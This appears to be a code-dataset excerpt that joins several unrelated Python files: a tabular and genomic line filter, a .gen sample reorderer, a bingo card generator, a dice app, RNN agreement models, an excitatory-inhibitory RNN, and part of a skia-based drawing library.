action='store', dest='outfilename_ex', default=False,
help='Name for the file where the excluded lines are written.'
' If not specified, they are discarded.')
parser.add_option('--header', action='store_true', dest='header', default=False,
help='If specified, do not filter the first line of the file.')
parser.add_option('--sep', type='string',
action='store', dest='sep', default='tab',
help='Use this as field separator.'
' The default value is tab.'
' Possible values are "tab", "space", "whitespace", or any string'
' such as "this script is awesome" or ";" enclosed in quotes.'
' If you use the'
' "whitespace" keyword as the separator, continuous stretches of'
' any whitespace'
' characters will be used as field separators in the input and'
' the output will be'
' separated by single spaces.')
parser.add_option('--filters',
dest='filters',
action='store',
default=False,
help='Filter input lines by values in named columns.'
' E.g. --filters "chrom=1,pos>3,pos<500,chrom!=MT".'
' Recognizes the operators ">", "<", "=", and "!=".')
parser.add_option('--ignore-case',
dest='ignore_case',
action='store_true',
default=False,
help='When using --keep or --remove: ignore case when '
'comparing letters, e.g. match "cat" to "CAT"')
parser.add_option('--debug',
dest='debug',
action='store_true',
default=False,
help='Turn debugging reports on')
parser.add_option('--partial-match',
dest='partial_match',
action='store_true',
default=False,
help='When using --filters: allow partial matches to column names'
' (if they are unique)')
parser.add_option('--substring-match',
dest='substring_match',
action='store_true',
default=False,
help='When using --keep or --remove: match if one and only one of the keywords'
' is a substring of the target.')
parser.add_option('--range',
dest='range',
action='store_true',
default=False,
help='--keep or --remove files contain genomic ranges'
' in the tabix format. E.g. "1:400-50000", or "1".')
parser.add_option('--chr-index',
dest='chr_index',
action='store',
type='int',
default=-666,
help='Index for the chromosome column. Used when'
' specifying --range.')
parser.add_option('--pos-index',
dest='pos_index',
action='store',
type='int',
default=-666,
help='Index for the base pair position column.'
' Used when specifying --range.')
parser.add_option('--assume-chr',
dest='assume_chr',
action='store',
default=False,
help='Use this as the chromosome code in the input.'
' Used when specifying --range.')
(options, args) = parser.parse_args()
if not (options.keep or options.remove or options.filters):
print_error('Please specify either --keep, --remove, or --filters')
sys.exit(0)
return options
def print_error(msg, vals=[]):
m = 'Error: ' + msg.format(*vals).strip() + '\n'
sys.stderr.write(m)
def print_debug(msg, vals=[]):
m = 'Debug: ' + msg.format(*vals).strip() + '\n'
sys.stderr.write(m)
def get_targets(options):
filename = options.keep
if filename is False:
filename = options.remove
try:
input = open(filename, 'r')
except IOError:
print_error('The file {} was not found.', vals=(filename))
sys.exit(0)
targets = {}
if options.range:
for line in input:
if ':' in line:
chrom = line.split(':')[0]
start = int(line.split(':')[1].split('-')[0])
end = int(line.split(':')[1].split('-')[1])
else:
chrom = line.strip()
start = None
end = None
assert start <= end
try:
targets[chrom].append((start, end))
except KeyError:
targets[chrom] = [(start, end)]
for chrom in targets:
targets[chrom].sort(key=lambda x: x[0]) # sort by start position
else:
for line in input:
line = line.strip()
if options.ignore_case:
line = line.lower()
targets[line] = 0
input.close()
return targets
def get_indexes(header_line, keys, options):
indexes = {}
header = split_line(header_line, options)
for i in enumerate(header):
for k in keys:
if options.partial_match:
match = k in i[1]
else:
match = k == i[1]
if match:
try:
indexes[k].append(i[0])
except KeyError:
indexes[k] = [i[0]]
unique_indexes = {}
for k, i in indexes.items():
u = set(i)
if len(u) > 1:
print_error('{} unequal matches for filter "{}"', vals=[len(u), k])
sys.exit(0)
else:
unique_indexes[k] = list(u)[0]
return unique_indexes
def float_or_return(i):
try:
return float(i)
except ValueError:
return i
class Filters:
operators = {'!=': operator.ne,
'=': operator.eq,
'<': operator.lt,
'>': operator.gt}
formatters = {'!=': float_or_return,
'=': float_or_return,
'<': float,
'>': float}
def build_filters(filters):
raw_filters = filters.split(',')
ready_filters = {}
for f in Filters.operators.keys():
ready_filters[f] = {}
for f in ready_filters.keys():
for r in raw_filters:
if f == '=' and '!=' in r:
continue
if f in r:
filter_key = r.split(f)[0]
filter_value = r.split(f)[1]
try:
ready_filters[f][filter_key].append(filter_value)
except KeyError:
ready_filters[f][filter_key] = [filter_value]
for f, targets in ready_filters.items():
for k, v in targets.items():
sys.stderr.write('# filter: {} {} {}\n'.format(k, f, v))
return ready_filters
def match_by_filters(targets, line, options):
ln = split_line(line, options)
found_set = set()
# options.filters: dict of dicts
# e.g. {filter_operator:{line_index:[target_values]}}
for filter in iter(options.filters):
fmter = Filters.formatters[filter]
oprtor = Filters.operators[filter]
cols = options.filters[filter].items()
for i, vals in cols:
i = ln[i]
for v in vals:
match = oprtor(fmter(i), fmter(v))
if match:
found_set.add(True)
else:
found_set.add(False)
if options.debug:
msg = '"{}" "{}" "{}" {}'
print_debug(msg, vals=(i, filter, v, match))
return found_set
def match_by_keyword(targets, line, options):
last = None
last_found = None
ln = split_line(line, options)
found_set = set()
cols = options.column
if cols is None:
cols = range(0, len(ln))
for column in cols:
try:
t = ln[column].strip()
if options.ignore_case:
t = t.lower()
except IndexError as e:
raise e
if t != last:
last = t
if options.substring_match is False:
last_found = last in targets
else:
n_matches = 0
for k in targets.keys():
if k in last:
n_matches += 1
last_found = (n_matches == 1)
found_set.add(last_found)
return found_set
def match_by_range(targets, line, options):
ln = split_line(line, options)
if options.assume_chr is False:
chrom = ln[options.chr_index]
else:
chrom = options.assume_chr
pos = int(ln[options.pos_index])
if chrom in targets:
for r in targets[chrom]:
if r[0] is None or r[1] is None:
return set([True])
if r[0] > pos:
break
elif r[1] >= pos:
return set([True])
else:
continue
return set([False])
def exit(*filehandles):
for f in filehandles:
if f is None:
continue
if f in [sys.stderr, sys.stdout, sys.stdin]:
continue
try:
f.close()
except:
pass
sys.exit(0)
def split_line(line, options):
return line.strip('\n').split(options.sep)
def main():
options = parse_options()
infilename = options.infilename
header = options.header
outfilename = options.outfilename
keep = options.keep
remove = options.remove
# make sure keep / remove are existing files
for i in (keep, remove):
if i is not False:
if os.path.isfile(i) is False:
msg = 'The file "{}" does not exist or is not readable.'
print_error(msg, vals=[i])
exit()
# parse the column notation
if options.column is not None:
options.column = [
int(i.strip()) - 1 for i in options.column.split(',')]
# move the column indexes to 0-based indexing
if options.pos_index is not False:
options.pos_index -= 1
if options.chr_index is not False:
options.chr_index -= 1
# set the delimiters
sep = options.sep
op_sep = sep
if sep == 'tab':
sep = '\t'
op_sep = '\t'
if sep == 'space':
sep = ' '
op_sep = ' '
if sep == 'whitespace':
sep = None
op_sep = ' '
options.sep = sep
linecounter = 0
n_removed = 0
n_kept = 0
input = None
if infilename is False:
input = sys.stdin
infilename = 'STDIN'
else:
try:
input = open(infilename, 'r')
except IOError:
print_error('File {} was not found.', vals=[infilename])
sys.exit(0)
output = None
if outfilename is False:
output = sys.stdout
else:
try:
output = open(outfilename, 'w')
except:
print_error('File {} could not be opened for writing output.',
vals=[outfilename])
exit(input)
output_ex = None
if options.outfilename_ex is not False:
try:
output_ex = open(options.outfilename_ex, 'w')
except:
print_error('File {} could not be opened for writing output.',
vals=[options.outfilename_ex])
exit(input, output, output_ex)
# handle the header
header_line = None
if header is True or options.by_col or options.filters is not False:
linecounter += 1
n_kept += 1
header_line = input.readline()
# if specifying --keep or --remove, read the corresponding files
targets = None
if options.filters is False:
targets = get_targets(options)
if targets is None:
sys.exit(0)
else:
# make the filter dict using column names as keys
options.filters = build_filters(options.filters)
all_filters = []
for i in options.filters:
all_filters += options.filters[i].keys()
# make sure that all specified column names are in the header
filter_indexes = get_indexes(header_line, all_filters, options)
for k in all_filters:
if k not in filter_indexes:
msg1 = 'The --filters key {} was not found on the header line.'.format(
k)
msg2 = 'Maybe you forgot to specify the correct --sep?'
print_error(msg1 + '\n' + msg2, vals=[k])
exit(input, output, output_ex)
# convert the keys from column names to column indexes
filters = {}
for f in iter(options.filters):
filters[f] = {}
for k, v in options.filters[f].items():
i = filter_indexes[k]
filters[f][i] = v
options.filters = filters
target_cols = []
new_header_line = None
if options.by_col:
cols = split_line(header_line, options)
for i in range(len(cols)):
found = cols[i].strip() in targets
if (found and keep is not False) or (not found and remove is not False):
target_cols.append(i)
new_header_line = op_sep.join([cols[i] for i in target_cols])
do_keep = keep is not False or options.filters is not False
do_remove = remove is not False and options.filters is False
# choose the matching function
if options.filters is not False:
matching_fun = match_by_filters
elif options.range:
matching_fun = match_by_range
else:
matching_fun = match_by_keyword
# write the header to the output first
if options.by_col:
output.write(new_header_line + '\n')
elif options.header or options.filters is not False:
output.write(header_line.rstrip('\n') + '\n')
# then handle the rest of the input lines
expected_col_n = None
if header_line is not None:
expected_col_n = len(split_line(header_line, options))
for line in input:
linecounter += 1
if len(line.strip()) == 0:
continue
ln = split_line(line, options)
if expected_col_n is None:
expected_col_n = len(ln)
else:
if len(ln) != expected_col_n:
msg = 'error: line {} had {} columns but the previous lines had {}.\n'
msg = msg + 'This program only works if all of the lines in the input '
msg = msg + 'have the same number of columns.\n'
msg = msg + 'Maybe you are not using the correct --sep?'
vals = (linecounter, len(ln), expected_col_n)
print_error(msg, vals=vals)
exit(input, output, output_ex)
if options.by_col:
n_kept += 1
l = [ln[i] for i in target_cols]
output.write(op_sep.join(l) + '\n')
if options.outfilename_ex != False:
l = [ln[i] for i in range(0, len(ln)) if i not in target_cols]
output_ex.write(op_sep.join(l) + '\n')
else:
try:
found_set = matching_fun(targets, line, options)
found = False
if True in found_set:
if options.match_all:
if False not in found_set:
found = True
else:
found = True
if (found and do_keep) or (not found and do_remove):
output.write(line)
n_kept += 1
else:
if options.outfilename_ex != False:
output_ex.write(line)
n_removed += 1
except IndexError:
msg = 'error: the file {} has only {} columns on line {},' \
' which is less than the minimum amount of' \
' columns implied by the --column value'
vals = (infilename, len(ln), linecounter)
print_error(msg + '\n' + line, vals=vals)
exit(input, output, output_ex)
# print final info
if do_remove:
action = 'removed'
n = n_removed
else:
action = 'kept'
n = n_kept
msg = 'done, {} {} of the {} lines in {}'
vals = (action, n, linecounter, infilename)
sys.stderr.write(msg.format(*vals) + '\n')
exit(input, output, output_ex)
if __name__ == '__main__':
main()
``` |
{
"source": "13am/order_genfile",
"score": 3
} |
#### File: order_genfile/src/order_genfile.py
```python
from argparse import ArgumentParser
import sys
import gzip
import numpy
MAX_SNPS_IN_BUFFER = 6
def parse_options():
parser = ArgumentParser()
parser.add_argument('--gen-in',
dest='genfile_in',
default=None,
help='Name of the input .gen file. Leave out if'
' you want to read the input from stdin.')
parser.add_argument('--gen-out',
dest='genfile_out',
default=None,
help='Name of the output .gen file. Leave out if'
' you want to write the output to stdout.')
parser.add_argument('--sample-in',
dest='sample_in',
default=None,
help='Name of the input .sample file.')
parser.add_argument('--sample-out',
dest='sample_out',
default=None,
help='Name of the output .sample file.')
parser.add_argument('--order',
dest='order',
default=None,
help='Specify the order of the output data.'
' ID_1 ID_2 per line.'
' First line -> first 3 probabilities etc.')
parser.add_argument('--model-sample',
dest='model_sample',
default=None,
help='Match the order of this sample file'
' when outputting data.')
parser.add_argument('--allow-subsetting',
action='store_true',
dest='allow_subsetting',
default=False,
help='Exclude any samples found in the input sample '
'file but not in the file order or model sample '
'files.')
options = parser.parse_args()
return options
def print_finish_and_stop():
sys.stderr.write('\nProgram finished with success.\n')
sys.exit()
def print_error_and_stop(msg):
main_msg = '\nError: {}\nTerminating the program because of the error.\n'
sys.stderr.write(main_msg.format(msg))
sys.exit()
def read_gen_lines(lines, n_samples):
# make the numpy array, verify all lines have the same number of columns
array = numpy.array(([i.strip().split(' ') for i in lines]))
n = len(array[0])
for i in array:
if len(i) != n:
print_error_and_stop('The number of genotypes in the input'
' is not constant.')
# the line may or may not have the chromosome code
i_genotypes = 5
if len(array[0]) % 3 == 0:
i_genotypes = 6
non_genotype_cols = array[..., :i_genotypes]
genotype_cols = array[..., i_genotypes:]
# always make sure the number of probabilities is 3 times N(of samples)
if len(genotype_cols[0]) != 3 * n_samples:
msg = ('Line for the SNP \n"{}"\ndid not have 3*{}'
' genotype probabilities')
print_error_and_stop(msg.format(' '.join(non_genotype_cols),
n_samples))
# use numpy to reshape the genotype columns
# now they are in [variant][probabilities]
# change into [variant][sample][probabilities]
n_snps = len(lines)
genotypes = genotype_cols.reshape(n_snps, n_samples, 3)
return non_genotype_cols, genotypes
def read_sample_order(fname, is_sample_file=None):
input_sample_order = []
with open(fname, 'r') as ip:
for line in ip.readlines():
ln = line.strip().split()
sample_id = ' '.join(ln[:2])
input_sample_order += [sample_id]
if is_sample_file:
input_sample_order = input_sample_order[2:]
# fail if duplicates are found
if len({i: i for i in input_sample_order}) != len(input_sample_order):
msg = 'The file "{}" contains duplicates.'
print_error_and_stop(msg.format(fname))
return tuple(input_sample_order)
def _write_lines(op, lines, n_samples_input, index_array):
snp_info_lines, genotypes = read_gen_lines(lines, n_samples_input)
new_indexing = numpy.ix_(range(0, len(genotypes)),
index_array)
ordered_genotypes = genotypes[new_indexing]
ordered_genotypes = ordered_genotypes.reshape(len(lines),
len(index_array) * 3)
op_data = numpy.column_stack((snp_info_lines,
ordered_genotypes))
op_lines = [' '.join(i) for i in op_data]
op.write('\n'.join([i for i in op_lines]) + '\n')
return len(op_lines)
def write_output(ip, op, n_samples_input, index_array):
counter = 0
buffered_lines = []
for line in ip:
buffered_lines.append(line)
if len(buffered_lines) == MAX_SNPS_IN_BUFFER:
counter += _write_lines(op, buffered_lines,
n_samples_input, index_array)
buffered_lines = []
if len(buffered_lines) > 0:
counter += _write_lines(op, buffered_lines,
n_samples_input, index_array)
return counter
def main():
options = parse_options()
# read the input sample order
input_sample_order = read_sample_order(options.sample_in,
is_sample_file=True)
# read the output sample order
new_sample_order_fname = options.model_sample
is_sample_file = True
if options.model_sample is None:
new_sample_order_fname = options.new_order
is_sample_file = False
new_sample_order = read_sample_order(new_sample_order_fname,
is_sample_file=is_sample_file)
new_sample_dict = {v: i for i, v in enumerate(new_sample_order)}
# make a dict from old -> new indexes for the genotypes
old_to_new_index = {}
for i_old, sample_id in enumerate(input_sample_order):
try:
i_new = new_sample_dict[sample_id]
old_to_new_index[i_old] = i_new
except KeyError:
if options.allow_subsetting:
pass
else:
msg = 'The sample "{}" was not in listed in "{}"' \
' and the --allow-subsetting flag was not' \
' in use.'
msg = msg.format(sample_id,
new_sample_order_fname)
print_error_and_stop(msg)
# write the new sample file
if options.sample_out is None:
print_error_and_stop('Please specify --sample-out.')
with open(options.sample_out, 'w') as op:
with open(options.sample_in, 'r') as ip:
old_lines = ip.readlines()
new_lines = [None for i in new_sample_order]
for i_old, l in enumerate(old_lines[2:]):
try:
i_new = old_to_new_index[i_old]
new_lines[i_new] = l
except KeyError:
continue
new_lines = old_lines[:2] + new_lines
op.write('\n'.join([i.strip() for i in new_lines]) + '\n')
# convert the dict to an index array
new_to_old_index = {i_new: i_old for i_old, i_new in
old_to_new_index.items()}
index_array = [None for i in new_to_old_index]
for new_index, old_index in new_to_old_index.items():
index_array[new_index] = old_index
if None in index_array:
print_error_and_stop('Error in making the index array')
index_array = tuple(index_array)
# figure out where and how to read the input genfile
if options.genfile_in is None:
ip = sys.stdin
elif options.genfile_in.endswith('.gz'):
ip = gzip.open(options.genfile_in, 'rb')
else:
ip = open(options.genfile_in, 'r')
# set output destination
if options.genfile_out is None:
op = sys.stdout
else:
op = open(options.genfile_out, 'w')
n_samples_input = len(input_sample_order)
n_written = write_output(ip, op, n_samples_input, index_array)
op.flush()
opname = 'STDOUT'
if op is not sys.stdout:
op.close()
opname = options.genfile_out
msg = '\nWrote {} samples and {} genotype lines to "{}"" and "{}"\n'
msg = msg.format(len(index_array), n_written,
options.sample_out, opname)
sys.stderr.write(msg)
print_finish_and_stop()
if __name__ == '__main__':
main()
``` |
{
"source": "13B-MSP/bingo_game",
"score": 3
} |
#### File: bingo/factories/bingo_card_factory.py
```python
import random
from typing import List
from ..models.bingo_card import BingoCard
def _transpose(ls: List[List[int]]) -> List[List[int]]:
"""
Helper function that transposes a 2d list of integers
"""
list_len = len(ls)
return [[ls[j][i] for j in range(list_len)] for i in range(list_len)]
class BingoCardFactory:
"""
Factory that creates bingo cards with certain min-, max- and size parameters
"""
def __init__(self, min_num: int, max_num: int, size: int) -> None:
"""
BingoCardFactory ctor
"""
self._min_num = min_num
self._max_num = max_num
self._size = size
def _generate_bingo_field(self) -> List[List[int]]:
"""
Generate a new bingo field, to then assign to a BingoCard
"""
col_nr_range = int(self._max_num / self._size)
field: List[List[int]] = [
random.sample(range(n, n+col_nr_range), k=self._size)
for n in range(self._min_num, self._max_num+1, col_nr_range)
]
middle = int(self._size / 2)
field[middle][middle] = -1
return _transpose(field)
def create(self) -> BingoCard:
"""
Create a new BingoCard
"""
return BingoCard(self._generate_bingo_field())
# This is a 'standard' 5 x 5 bingo card factory with maximum nr of 75
standard_bingo_card_factory = BingoCardFactory(1, 75, 5)
def create_standard_bingo_card() -> List[List[int]]:
"""
Create a standard BingoCard using the standard_bingo_card_factory
"""
return standard_bingo_card_factory.create()
``` |
{
"source": "13burn/python_fun",
"score": 3
} |
#### File: python_fun/dice/dice.py
```python
import eel
import random
from time import sleep
eel.init("front")
@eel.expose
def randGen(top):
for num in range(top):
#print in front end
eel.diceShow(random.randint(1,top))
if top > 100:
sleep(.015)
else:
sleep(.15)
eel.start("front.html")
``` |
{
"source": "13dexter/agreement_brain_nn",
"score": 3
} |
#### File: agreement_brain_nn/rnnagr/agreement_acceptor.py
```python
import random
from keras.layers.core import Dense, Activation
from keras.layers.embeddings import Embedding
from keras.models import Sequential
from keras.preprocessing import sequence
import numpy as np
import pandas as pd
from rnn_model import RNNModel
from utils import gen_inflect_from_vocab, dependency_fields
class RNNAcceptor(RNNModel):
def create_train_and_test(self, examples):
d = [[], []]
for i, s, dep in examples:
d[i].append((i, s, dep))
random.seed(1)
random.shuffle(d[0])
random.shuffle(d[1])
if self.equalize_classes:
l = min(len(d[0]), len(d[1]))
examples = d[0][:l] + d[1][:l]
else:
examples = d[0] + d[1]
random.shuffle(examples)
Y, X, deps = zip(*examples)
Y = np.asarray(Y)
X = sequence.pad_sequences(X, maxlen=self.maxlen)
n_train = int(self.prop_train * len(X))
self.X_train, self.Y_train = X[:n_train], Y[:n_train]
self.X_test, self.Y_test = X[n_train:], Y[n_train:]
self.deps_train = deps[:n_train]
self.deps_test = deps[n_train:]
def create_model(self):
self.log('Creating model')
self.model = Sequential()
self.model.add(Embedding(len(self.vocab_to_ints) + 1,
self.embedding_size,
input_length=self.maxlen))
self.model.add(self.rnn_class(output_dim=self.rnn_output_size,
input_length=self.maxlen,
unroll=True))
self.model.add(Dense(1))
self.model.add(Activation('sigmoid'))
def compile_model(self):
self.log('Compiling model')
self.model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
def evaluate(self):
return self.model.evaluate(self.X_test, self.Y_test,
batch_size=self.batch_size)
def results(self):
self.log('Processing test set')
predicted = self.model.predict_classes(self.X_test,
verbose=self.verbose).flatten()
recs = []
columns = ['correct', 'prediction', 'label'] + dependency_fields
for dep, prediction in zip(self.deps_test, predicted):
prediction = self.code_to_class[prediction]
recs.append((prediction == dep['label'], prediction,
dep['label']) +
tuple(dep[x] for x in dependency_fields))
self.test_results = pd.DataFrame(recs, columns=columns)
class CorruptAgreement(RNNAcceptor):
def __init__(self, *args, **kwargs):
RNNAcceptor.__init__(self, *args, **kwargs)
self.class_to_code = {'grammatical': 0, 'ungrammatical': 1}
self.code_to_class = {x: y for y, x in self.class_to_code.items()}
self.inflect_verb, _ = gen_inflect_from_vocab(self.vocab_file)
def process_single_dependency(self, dep):
tokens = dep['sentence'].split()
if random.random() < 0.5:
dep['label'] = 'ungrammatical'
v = int(dep['verb_index']) - 1
tokens[v] = self.inflect_verb[tokens[v]]
dep['sentence'] = ' '.join(tokens)
else:
dep['label'] = 'grammatical'
return tokens
class PredictVerbNumber(RNNAcceptor):
def __init__(self, *args, **kwargs):
RNNAcceptor.__init__(self, *args, **kwargs)
self.class_to_code = {'VBZ': 0, 'VBP': 1}
self.code_to_class = {x: y for y, x in self.class_to_code.items()}
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
v = int(dep['verb_index']) - 1
tokens = dep['sentence'].split()[:v]
return tokens
class PredictVerbNumberOnlyNouns(PredictVerbNumber):
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
tokens = dep['nouns_up_to_verb'].split()
return tokens
class PredictVerbNumberOnlyGeneralizedNouns(PredictVerbNumber):
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
tokens = dep['sentence'].split()[:dep['verb_index']]
poses = dep['pos_sentence'].split()[:dep['verb_index']]
tokens = [token for token, pos in zip(tokens, poses) if
pos in ['NN', 'NNS', 'NNP', 'PRP']]
print dep['sentence']
print tokens
print
return tokens
class InflectVerb(PredictVerbNumber):
'''
Present all words up to _and including_ the verb, but withhold the number
of the verb (always present it in the singular form). Supervision is
still the original number of the verb. This task allows the system to use
the semantics of the verb to establish the dependency with its subject, so
may be easier. Conversely, this may mess up the embedding of the singular
form of the verb; one solution could be to expand the vocabulary with
number-neutral lemma forms.
'''
def __init__(self, *args, **kwargs):
super(InflectVerb, self).__init__(*args, **kwargs)
self.inflect_verb, _ = gen_inflect_from_vocab(self.vocab_file)
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
v = int(dep['verb_index']) - 1
tokens = dep['sentence'].split()[:v+1]
if dep['verb_pos'] == 'VBP':
tokens[v] = self.inflect_verb[tokens[v]]
return tokens
``` |
{
"source": "13dexter/eirnn_agreement",
"score": 2
} |
#### File: eirnn_agreement/eirnn/eirnn_cross.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import math
def rectify(x):
relu = nn.ReLU()
return relu(x)
# return x
class EIRnnModule(nn.Module):
def __init__(self, input_units, output_units, hidden_units, embedding_dim = 50, rectify_inputs = True, var_input = 0.01**2, var_rec = 0.15**2, dt = 0.5, tau=100):
super(EIRnnModule, self).__init__()
self.n = hidden_units
self.n_in = input_units
self.n_out = output_units
self.embedding_dim = embedding_dim
self.rectify_inputs = rectify_inputs
self.var_in = var_input
self.var_rec = var_rec
self.dt = dt
self.tau = tau
self.alpha = dt/tau
self.w_in = rectify(Variable(torch.randn(hidden_units, input_units), requires_grad = True))
self.w_rec = rectify(Variable(torch.randn(hidden_units, hidden_units), requires_grad = True))
self.w_out = rectify(Variable(torch.randn(output_units, hidden_units), requires_grad = True))
self.d_rec = Variable(torch.zeros(hidden_units, hidden_units), requires_grad=False)
self.no_self_connect = Variable(torch.ones(hidden_units, hidden_units), requires_grad=False)
for i in range(hidden_units) :
self.no_self_connect = 0.0
if (i < 0.8*hidden_units):
self.d_rec[i][i] = 1.0
else:
self.d_rec[i][i] = -1.0
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters (weights) like mentioned in the paper.
"""
def forward(self, input_, states):
"""
Args:
input_: A (embedding_dim, input_units) tensor containing input
features.
states: Contains the initial cell states, which has
the size (embedding_dim, hidden_units).
Returns:
state: Tensor containing the next cell state.
"""
# Rectify to upholds Dale's
self.w_in = rectify(self.w_in)
self.w_rec = rectify(self.w_rec)
self.w_out = rectify(self.w_out)
rectified_states = rectify(states)
# rectified_states = states
# No self connections
self.w_rec = self.w_rec * self.no_self_connect
# Apply Dale's on recurrent weights
w_rec_dale = torch.mm(self.w_rec, self.d_rec)
# w_rec_dale = self.w_rec
# print('W_in : ', self.w_in)
# print('W_rec : ', self.w_rec)
# print('W_out : ', self.w_out)
# print('D_rec : ', self.d_rec)
# print('Dale : ', w_rec_dale)
hidden_update = torch.mm(w_rec_dale, rectified_states)
input_update = torch.mm(self.w_in, input_)
states = (1 - self.alpha) * states + self.alpha * (hidden_update + input_update) #+ math.sqrt(2 * self.alpha * self.var_rec) * 0.001 # guassian(0,1)
rectified_states = rectify(states)
# rectified_states = states
# [u, v] = state.size()
outputs = torch.mm(self.w_out, rectified_states)
return states, outputs
class EIRnn(nn.Module):
def __init__(self, embedding_dim, input_units, hidden_units, output_units, vocab_size, num_layers = 1, dropout=0):
super(EIRnn, self).__init__()
self.embedding_dim = embedding_dim
self.input_units = input_units
self.hidden_units = hidden_units
self.output_units = output_units
self.num_layers = num_layers
self.dropout = dropout
for layer in range(num_layers):
layer_input_units = input_units if layer == 0 else hidden_units
cell = EIRnnModule(input_units = input_units, output_units = output_units, hidden_units = hidden_units)
setattr(self, 'cell_{}'.format(layer), cell)
self.embedding_layer = torch.nn.Embedding(vocab_size, embedding_dim)
# self.dropout_layer = nn.Dropout(dropout)
self.linear = nn.Linear(output_units * embedding_dim * num_layers, 2)
# self.softmax = nn.Softmax(dim=0)
self.reset_parameters()
def get_cell(self, layer):
return getattr(self, 'cell_{}'.format(layer))
def reset_parameters(self):
for layer in range(self.num_layers):
cell = self.get_cell(layer)
cell.reset_parameters()
def forward(self, input_, max_time = 15, input_once = True, states_init = None) :
if states_init is None:
states_init = torch.zeros([self.hidden_units, self.embedding_dim], dtype=torch.float)
# state_n = []
layer_output = None
all_layers_last_output = []
input0 = torch.zeros(len(input_), dtype=torch.long)
inputx = torch.tensor(input_, requires_grad = False)
for layer in range(self.num_layers):
cell = self.get_cell(layer)
output = []
states = states_init
for time in range(max_time):
if (input_once and time != 0) :
next_states, outs = cell(input_ = self.embedding_layer(input0), states = states)
else :
next_states, outs = cell(input_ = self.embedding_layer(inputx), states = states)
output.append(outs)
states = next_states
last_outs = outs
# layer_states = states
layer_output = torch.stack(output, 0)
all_layers_last_output.append(last_outs)
# input_ = self.dropout_layer(layer_output)
# state_n.append(layer_states)
# state_n = torch.stack(state_n, 0)
output = torch.stack(all_layers_last_output, 0)
output = output.view(self.output_units * self.embedding_dim * self.num_layers)
softmax_out = self.linear(output)
# softmax_out = self.softmax(out2softmax_in)
softmax_out = torch.stack([softmax_out], 0)
return softmax_out
``` |
{
"source": "13-Graphics/drawbot-skia",
"score": 3
} |
#### File: src/drawbot_skia/drawing.py
```python
import contextlib
import functools
import math
import skia
from .document import RecordingDocument
from .errors import DrawbotError
from .gstate import GraphicsState
class Drawing:
def __init__(self, document=None, flipCanvas=True):
self._stack = []
self._gstate = GraphicsState()
if document is None:
document = RecordingDocument()
self._document = document
self._skia_canvas = None
self._flipCanvas = flipCanvas
@property
def _canvas(self):
if self._skia_canvas is None:
self.size(1000, 1000) # This will create the canvas
return self._skia_canvas
@_canvas.setter
def _canvas(self, canvas):
self._skia_canvas = canvas
def newDrawing(self):
...
def endDrawing(self):
...
def size(self, width, height):
if self._document.isDrawing:
raise DrawbotError("size() can't be called if there's already a canvas active")
self.newPage(width, height)
def newPage(self, width, height):
if self._document.isDrawing:
self._document.endPage()
self._canvas = self._document.beginPage(width, height)
if self._flipCanvas:
self._canvas.translate(0, height)
self._canvas.scale(1, -1)
def width(self):
return self._document.pageWidth
def height(self):
return self._document.pageHeight
def rect(self, x, y, w, h):
self._drawItem(self._canvas.drawRect, (x, y, w, h))
def oval(self, x, y, w, h):
self._drawItem(self._canvas.drawOval, (x, y, w, h))
def line(self, pt1, pt2):
x1, y1 = pt1
x2, y2 = pt2
self._drawItem(self._canvas.drawLine, x1, y1, x2, y2)
def polygon(self, firstPoint, *points, close=True):
from .path import BezierPath
bez = BezierPath()
bez.polygon(firstPoint, *points, close=close)
self.drawPath(bez)
def drawPath(self, path):
self._drawItem(self._canvas.drawPath, path.path)
def clipPath(self, path):
self._canvas.clipPath(path.path, doAntiAlias=True)
def fill(self, *args):
self._gstate.setFillColor(_colorArgs(args))
def stroke(self, *args):
self._gstate.setStrokeColor(_colorArgs(args))
def blendMode(self, blendMode):
if blendMode not in _blendModes:
raise DrawbotError(f"blendMode must be one of: {_blendModesList}")
self._gstate.setBlendMode(blendMode)
def strokeWidth(self, value):
self._gstate.setStrokeWidth(value)
def lineCap(self, lineCap):
self._gstate.setLineCap(lineCap)
def lineJoin(self, lineJoin):
self._gstate.setLineJoin(lineJoin)
def lineDash(self, firstValue=None, *values):
if firstValue is None:
if values:
raise TypeError("lineDash() argument(s) should be None, or one or more numbers")
self._gstate.setLineDash(firstValue, *values)
def miterLimit(self, miterLimit):
self._gstate.setMiterLimit(miterLimit)
def font(self, fontNameOrPath, fontSize=None):
if fontSize is not None:
self.fontSize(fontSize)
self._gstate.setFont(fontNameOrPath)
def fontSize(self, size):
self._gstate.setFontSize(size)
def openTypeFeatures(self, *, resetFeatures=False, **features):
return self._gstate.setOpenTypeFeatures(features, resetFeatures)
def fontVariations(self, *, resetVariations=False, **variations):
return self._gstate.setFontVariations(variations, resetVariations)
def language(self, language):
return self._gstate.setLanguage(language)
def textSize(self, txt):
# TODO: with some smartness we can shape only once, for a
# textSize()/text() call combination with the same text and
# the same text parameters.
glyphsInfo = self._gstate.textStyle.shape(txt)
textWidth = glyphsInfo.endPos[0]
return (textWidth, self._gstate.textStyle.skFont.getSpacing())
def text(self, txt, position, align=None):
if not txt:
# Hard Skia crash otherwise
return
glyphsInfo = self._gstate.textStyle.shape(txt)
blob = self._gstate.textStyle.makeTextBlob(glyphsInfo, align)
x, y = position
self._canvas.save()
try:
self._canvas.translate(x, y)
if self._flipCanvas:
self._canvas.scale(1, -1)
self._drawItem(self._canvas.drawTextBlob, blob, 0, 0)
finally:
self._canvas.restore()
def image(self, imagePath, position, alpha=1.0):
im = self._getImage(imagePath)
paint = skia.Paint()
if alpha != 1.0:
paint.setAlpha(round(alpha * 255))
if self._gstate.fillPaint.blendMode != "normal":
paint.setBlendMode(self._gstate.fillPaint.skPaint.getBlendMode())
x, y = position
self._canvas.save()
try:
self._canvas.translate(x, y + im.height())
if self._flipCanvas:
self._canvas.scale(1, -1)
self._canvas.drawImage(im, 0, 0, paint)
finally:
self._canvas.restore()
@staticmethod
@functools.lru_cache(maxsize=32)
def _getImage(imagePath):
return skia.Image.open(imagePath)
def translate(self, x, y):
self._canvas.translate(x, y)
def rotate(self, angle, center=(0, 0)):
cx, cy = center
self._canvas.rotate(angle, cx, cy)
def scale(self, sx, sy=None, center=(0, 0)):
if sy is None:
sy = sx
